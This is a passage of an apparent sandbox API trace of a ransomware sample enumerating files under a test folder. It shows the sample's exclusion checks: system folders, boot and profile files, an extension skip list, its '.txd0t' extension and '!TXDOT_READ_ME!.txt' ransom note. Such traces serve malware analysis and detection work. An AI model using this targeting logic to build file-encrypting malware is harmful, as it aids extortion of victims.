PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.102] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0071.102] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.102] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.102] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.102] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.102] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.102] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.102] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0071.102] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0071.102] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0071.102] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1036", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036") returned="C:\\588bce7c90097ed212\\1036" [0071.102] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\") returned="C:\\588bce7c90097ed212\\1036\\" [0071.102] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1036\\SetupResources.dll" [0071.103] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.103] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0071.103] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0071.103] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0071.103] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0071.103] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0071.103] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0071.103] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0071.103] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0071.103] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0071.103] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0071.103] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0071.103] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0071.103] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0071.103] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0071.103] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.103] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.103] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.103] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0071.103] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0071.103] GetProcessHeap () returned 0xe30000 [0071.103] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec8320 | out: hHeap=0xe30000) returned 1 [0071.103] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1037", cAlternateFileName="")) returned 1 [0071.103] StrCmpW (psz1="1037", psz2=".") returned 1 [0071.103] StrCmpW (psz1="1037", psz2="..") returned 1 [0071.103] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.103] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.103] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1037", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1037") returned="C:\\588bce7c90097ed212\\1037" [0071.103] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\windows\\system32\\") returned 0x0 [0071.103] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\windows\\syswow64\\") returned 0x0 [0071.103] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\windows\\system\\") returned 0x0 [0071.104] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\windows\\winsxs\\") returned 0x0 [0071.104] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\appdata\\roaming\\") returned 0x0 [0071.104] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\appdata\\local\\") returned 0x0 [0071.104] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\appdata\\locallow\\") returned 0x0 [0071.104] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\all users\\microsoft\\") returned 0x0 [0071.104] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\inetpub\\logs\\") returned 0x0 [0071.104] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch=":\\boot\\") returned 0x0 [0071.104] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch=":\\perflogs\\") returned 0x0 [0071.104] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch=":\\programdata\\") returned 0x0 [0071.104] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch=":\\drivers\\") returned 0x0 [0071.104] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch=":\\wsus\\") returned 0x0 [0071.104] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch=":\\efstmpwp\\") returned 0x0 [0071.104] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch=":\\$recycle.bin\\") returned 0x0 [0071.104] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="crypt_detect") returned 0x0 [0071.104] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="cryptolocker") returned 0x0 [0071.104] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="ransomware") returned 0x0 [0071.104] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="C:\\WINDOWS") returned 0x0 [0071.104] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="C:\\Program Files (x86)") returned 0x0 [0071.104] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="C:\\Program Files") returned 0x0 [0071.104] GetProcessHeap () returned 0xe30000 [0071.104] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xec8320 [0071.104] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1037", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037") returned="C:\\588bce7c90097ed212\\1037" [0071.104] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\*") returned="C:\\588bce7c90097ed212\\1037\\*" [0071.104] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1037\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2770 [0071.104] StrCmpW (psz1=".", psz2=".") returned 0 [0071.104] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.105] StrCmpW (psz1="..", psz2=".") returned 1 [0071.105] StrCmpW (psz1="..", psz2="..") returned 0 [0071.105] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1ac3, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0071.105] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0071.105] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0071.105] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1037", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037") returned="C:\\588bce7c90097ed212\\1037" [0071.105] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\") returned="C:\\588bce7c90097ed212\\1037\\" [0071.105] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned="C:\\588bce7c90097ed212\\1037\\eula.rtf" [0071.105] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.105] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0071.105] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0071.105] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0071.105] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0071.105] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0071.105] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0071.105] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0071.105] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0071.105] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0071.105] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0071.105] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0071.105] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0071.105] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0071.105] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0071.105] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.105] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.105] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0071.105] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.105] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.105] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.105] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.106] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.106] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.106] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1198c, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0071.106] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0071.106] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0071.106] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1037", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037") returned="C:\\588bce7c90097ed212\\1037" [0071.106] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\") returned="C:\\588bce7c90097ed212\\1037\\" [0071.106] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" [0071.106] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.106] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0071.106] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0071.106] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0071.106] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0071.106] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0071.106] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0071.106] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0071.106] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0071.106] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0071.106] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0071.106] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0071.106] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0071.106] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0071.106] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0071.106] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.106] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.106] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0071.106] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.106] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.107] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.107] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.107] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.107] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.107] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0071.107] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0071.107] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0071.107] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1037", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037") returned="C:\\588bce7c90097ed212\\1037" [0071.107] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\") returned="C:\\588bce7c90097ed212\\1037\\" [0071.107] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1037\\SetupResources.dll" [0071.107] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.107] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0071.107] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0071.107] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0071.107] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0071.107] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0071.107] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0071.107] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0071.107] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0071.107] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0071.107] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0071.107] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0071.107] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0071.107] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0071.107] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0071.107] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.107] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.107] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.107] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0071.107] FindClose (in: hFindFile=0xec2770 | out: hFindFile=0xec2770) returned 1 [0071.108] GetProcessHeap () returned 0xe30000 [0071.108] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec8320 | out: hHeap=0xe30000) returned 1 [0071.108] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1038", cAlternateFileName="")) returned 1 [0071.108] StrCmpW (psz1="1038", psz2=".") returned 1 [0071.108] StrCmpW (psz1="1038", psz2="..") returned 1 [0071.108] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.108] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.108] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1038", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1038") returned="C:\\588bce7c90097ed212\\1038" [0071.108] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\windows\\system32\\") returned 0x0 [0071.108] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\windows\\syswow64\\") returned 0x0 [0071.108] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\windows\\system\\") returned 0x0 [0071.108] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\windows\\winsxs\\") returned 0x0 [0071.108] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\appdata\\roaming\\") returned 0x0 [0071.108] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\appdata\\local\\") returned 0x0 [0071.108] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\appdata\\locallow\\") returned 0x0 [0071.108] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\all users\\microsoft\\") returned 0x0 [0071.108] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\inetpub\\logs\\") returned 0x0 [0071.108] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch=":\\boot\\") returned 0x0 [0071.108] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch=":\\perflogs\\") returned 0x0 [0071.108] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch=":\\programdata\\") returned 0x0 [0071.108] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch=":\\drivers\\") returned 0x0 [0071.108] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch=":\\wsus\\") returned 0x0 [0071.108] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch=":\\efstmpwp\\") returned 0x0 [0071.108] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch=":\\$recycle.bin\\") returned 0x0 [0071.108] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="crypt_detect") returned 0x0 [0071.108] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="cryptolocker") returned 0x0 [0071.108] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="ransomware") returned 0x0 [0071.108] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="C:\\WINDOWS") returned 0x0 [0071.108] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="C:\\Program Files (x86)") returned 0x0 [0071.108] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="C:\\Program Files") returned 0x0 [0071.109] GetProcessHeap () returned 0xe30000 [0071.109] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xec8320 [0071.109] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1038", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038") returned="C:\\588bce7c90097ed212\\1038" [0071.109] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\*") returned="C:\\588bce7c90097ed212\\1038\\*" [0071.109] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1038\\*", 